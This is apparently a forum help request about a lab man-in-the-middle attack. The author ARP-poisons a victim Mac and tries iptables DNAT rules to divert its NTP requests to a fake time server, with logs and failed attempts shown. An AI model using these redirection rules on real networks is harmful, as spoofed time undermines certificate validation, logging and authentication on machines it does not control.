CONFIGURATIONS
ipv4.forwarding 1 (ON)
ARP cache poisoning between VICTIM & D.G. (192.168.1.100 & 192.168.1.1)
**LAN**
VICTIM: 192.168.1.100
ATTACKER: 192.168.1.105
DEFAULT GATEWAY: 192.168.1.1
**WAN**
NTP SERVERS: 17.253.52.125
17.253.52.253
17.253.34.125
17.253.34.125
NORMAL BEHAVIOUR OF NTPv4 PROTOCOL
A Mac machine sends an NTPv4 request to one of Apple's NTP servers (NTP pool). As a reply it gets an NTPv4 response with the updated time. The frequency between time updates is 15 minutes. Since there are no security checks by default in NTPv4, it is vulnerable to a replay attack.
MALICIOUS BEHAVIOR
The attacker runs a MITM and eavesdrops on the traffic until it gets an NTPv4 request from the VICTIM. Once the request is received, it has to be redirected to the FAKE NTP SERVER running on the ATTACKER's machine, which then replies with a fake time to the VICTIM so that it will update its time.
ISSUES
It could be achieved by using iptables. I am stating this as I have done it before and it was working for me. However, I lost my configurations. Now, the situation is that I tried to run a few different iptables settings such as:
iptables -t nat -A PREROUTING -s 192.168.1.100 -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
iptables -t nat -A POSTROUTING -j MASQUERADE
FINDINGS
My logging NTP server shows the following log:
Sent to 192.168.1.100:55321 Sent to 192.168.1.199:54623
which indicates that NTP requests are being redirected to the FAKE NTP server. However, the FAKE NTP replies are not delivered to the VICTIM as expected.
Another capture is from the Wireshark sniffer.
It shows that the VICTIM sends an NTPv4 request to Apple's NTP server via the ATTACKER's machine, and gets an NTPv4 response back from the same Apple NTP server via the ATTACKER's host.
MY ATTEMPTS
Attempt: 1.
iptables -t nat -A PREROUTING -s 192.168.1.100 -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
iptables -t nat -A POSTROUTING -p udp -j MASQUERADE
iptables -A OUTPUT -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
***Notes: It didn't work for the first hour (15 mins + 15 + 15 + 15), and I decided to leave it for a night. When I came back after 7 hours, it appeared to have updated the time as expected. It is very unusual, and definitely something is going wrong. To me, it seems like the FAKE NTP SERVER won a race against the NTP response from Apple's NTP server.
Attempt: 2.
I have tried to run the following:
iptables -t nat -A PREROUTING -s 192.168.1.100 -p udp --dport 123 -j DNAT --to-destination 192.168.1.105:123
iptables -t nat -A POSTROUTING -p udp -j MASQUERADE
iptables -A INPUT -s 17.253.0.0/16 -p udp -j DROP
***Notes: It didn't work at all, and even the incoming NTP response traffic from Apple's NTP server wasn't blocked.
In the end, I have tried many different scenarios with iptables, and I am seeking your help, guys, to feed the VICTIM's machine with my FAKE NTP response packet so that it gets time updates from my FAKE NTP SERVER, not from Apple's NTP pool, using iptables.
Thank you in advance!